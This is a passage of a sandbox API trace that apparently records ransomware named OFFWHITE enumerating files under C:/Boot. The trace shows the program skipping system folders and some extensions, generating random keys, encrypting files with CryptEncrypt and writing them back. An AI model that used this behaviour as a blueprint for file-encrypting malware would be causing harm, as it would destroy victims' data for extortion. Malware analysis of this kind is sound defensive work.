[0082.285] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.285] GetProcessHeap () returned 0x500000 [0082.285] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5485b0 [0082.285] GetProcessHeap () returned 0x500000 [0082.285] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548598 [0082.285] GetProcessHeap () returned 0x500000 [0082.285] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520720 [0082.285] GetProcessHeap () returned 0x500000 [0082.285] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520828 [0082.285] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.285] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.285] SystemFunction036 (in: RandomBuffer=0x5485b0, RandomBufferLength=0x10 | out: RandomBuffer=0x5485b0) returned 1 [0082.286] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.286] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.286] SystemFunction036 (in: RandomBuffer=0x548598, RandomBufferLength=0x10 | out: RandomBuffer=0x548598) returned 1 [0082.286] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.286] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.286] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520720*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x520720*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.286] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.286] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.286] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520828*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x520828*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.286] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.286] SetLastError (dwErrCode=0x0) [0082.286] WriteFile (in: hFile=0xffffffff, lpBuffer=0x520720, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.286] GetLastError () returned 0x6 [0082.286] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.287] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.287] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2=".") returned 1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="..") returned 1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="...") returned 1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="windows") returned -1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="$recycle.bin") returned 1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="rsa") returned -1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="ntuser.dat") returned -1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="programdata") returned -1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="appdata") returned 1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="program files") returned -1 [0082.287] lstrcmpiW (lpString1="ko-KR", lpString2="program files (x86)") returned -1 [0082.287] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.287] lstrcatW (in: lpString1="C:/Boot\\", lpString2="ko-KR" | out: lpString1="C:/Boot\\ko-KR") returned="C:/Boot\\ko-KR" [0082.287] lstrcatW (in: lpString1="C:/Boot\\ko-KR", lpString2="\\" | out: lpString1="C:/Boot\\ko-KR\\") returned="C:/Boot\\ko-KR\\" [0082.287] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\ko-KR\\" | out: lpString1="C:/Boot\\ko-KR\\") returned="C:/Boot\\ko-KR\\" [0082.287] lstrcatW (in: lpString1="C:/Boot\\ko-KR\\", lpString2="*.*" | out: lpString1="C:/Boot\\ko-KR\\*.*") returned="C:/Boot\\ko-KR\\*.*" [0082.287] FindFirstFileW (in: lpFileName="C:/Boot\\ko-KR\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.288] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.288] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.288] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.288] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.289] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.289] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.289] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\ko-KR\\" | out: lpString1="C:/Boot\\ko-KR\\") returned="C:/Boot\\ko-KR\\" [0082.289] lstrcatW (in: lpString1="C:/Boot\\ko-KR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\ko-KR\\bootmgr.exe.mui") returned="C:/Boot\\ko-KR\\bootmgr.exe.mui" [0082.289] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.289] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.289] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.289] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.290] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.290] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.290] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.290] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.290] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.290] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.290] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.290] GetProcessHeap () returned 0x500000 [0082.290] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bc40 [0082.290] CreateFileW (lpFileName="C:/Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.290] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.290] GetProcessHeap () returned 0x500000 [0082.290] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548448 [0082.290] GetProcessHeap () returned 0x500000 [0082.290] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548430 [0082.290] GetProcessHeap () returned 0x500000 [0082.290] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520930 [0082.290] GetProcessHeap () returned 0x500000 [0082.290] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520a38 [0082.290] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.291] SystemFunction036 (in: RandomBuffer=0x548448, RandomBufferLength=0x10 | out: RandomBuffer=0x548448) returned 1 [0082.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.291] SystemFunction036 (in: RandomBuffer=0x548430, RandomBufferLength=0x10 | out: RandomBuffer=0x548430) returned 1 [0082.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.291] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520930*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x520930*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.291] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520a38*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x520a38*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.291] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.291] SetLastError (dwErrCode=0x0) [0082.291] WriteFile (in: hFile=0xffffffff, lpBuffer=0x520930, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.292] GetLastError () returned 0x6 [0082.292] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.292] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.292] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2=".") returned 1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="..") returned 1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="...") returned 1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="windows") returned -1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="$recycle.bin") returned 1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="rsa") returned -1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="ntuser.dat") returned -1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="programdata") returned -1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="appdata") returned 1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="program files") returned -1 [0082.292] lstrcmpiW (lpString1="memtest.exe", lpString2="program files (x86)") returned -1 [0082.292] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.292] lstrcatW (in: lpString1="C:/Boot\\", lpString2="memtest.exe" | out: lpString1="C:/Boot\\memtest.exe") returned="C:/Boot\\memtest.exe" [0082.292] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.292] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.292] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0082.292] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0082.292] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2=".") returned 1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="..") returned 1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="...") returned 1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="windows") returned -1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="$recycle.bin") returned 1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="rsa") returned -1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="ntuser.dat") returned -1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="programdata") returned -1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="appdata") returned 1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="program files") returned -1 [0082.293] lstrcmpiW (lpString1="nb-NO", lpString2="program files (x86)") returned -1 [0082.293] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.293] lstrcatW (in: lpString1="C:/Boot\\", lpString2="nb-NO" | out: lpString1="C:/Boot\\nb-NO") returned="C:/Boot\\nb-NO" [0082.293] lstrcatW (in: lpString1="C:/Boot\\nb-NO", lpString2="\\" | out: lpString1="C:/Boot\\nb-NO\\") returned="C:/Boot\\nb-NO\\" [0082.293] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\nb-NO\\" | out: lpString1="C:/Boot\\nb-NO\\") returned="C:/Boot\\nb-NO\\" [0082.293] lstrcatW (in: lpString1="C:/Boot\\nb-NO\\", lpString2="*.*" | out: lpString1="C:/Boot\\nb-NO\\*.*") returned="C:/Boot\\nb-NO\\*.*" [0082.293] FindFirstFileW (in: lpFileName="C:/Boot\\nb-NO\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.294] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.294] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.294] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.294] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.294] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.294] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\nb-NO\\" | out: lpString1="C:/Boot\\nb-NO\\") returned="C:/Boot\\nb-NO\\" [0082.294] lstrcatW (in: lpString1="C:/Boot\\nb-NO\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\nb-NO\\bootmgr.exe.mui") returned="C:/Boot\\nb-NO\\bootmgr.exe.mui" [0082.294] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.294] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.294] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.294] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.294] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.294] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.295] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.295] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.295] GetProcessHeap () returned 0x500000 [0082.295] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bcb0 [0082.295] CreateFileW (lpFileName="C:/Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.296] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.296] GetProcessHeap () returned 0x500000 [0082.296] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548418 [0082.296] GetProcessHeap () returned 0x500000 [0082.296] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548400 [0082.296] GetProcessHeap () returned 0x500000 [0082.296] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520b40 [0082.296] GetProcessHeap () returned 0x500000 [0082.296] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520c48 [0082.296] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.296] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.296] SystemFunction036 (in: RandomBuffer=0x548418, RandomBufferLength=0x10 | out: RandomBuffer=0x548418) returned 1 [0082.296] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.297] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.297] SystemFunction036 (in: RandomBuffer=0x548400, RandomBufferLength=0x10 | out: RandomBuffer=0x548400) returned 1 [0082.297] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.297] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.297] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520b40*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x520b40*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.297] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.297] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.297] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520c48*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x520c48*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.297] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.297] SetLastError (dwErrCode=0x0) [0082.297] WriteFile (in: hFile=0xffffffff, lpBuffer=0x520b40, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.298] GetLastError () returned 0x6 [0082.298] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.298] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.298] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2=".") returned 1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="..") returned 1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="...") returned 1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="windows") returned -1 [0082.298] 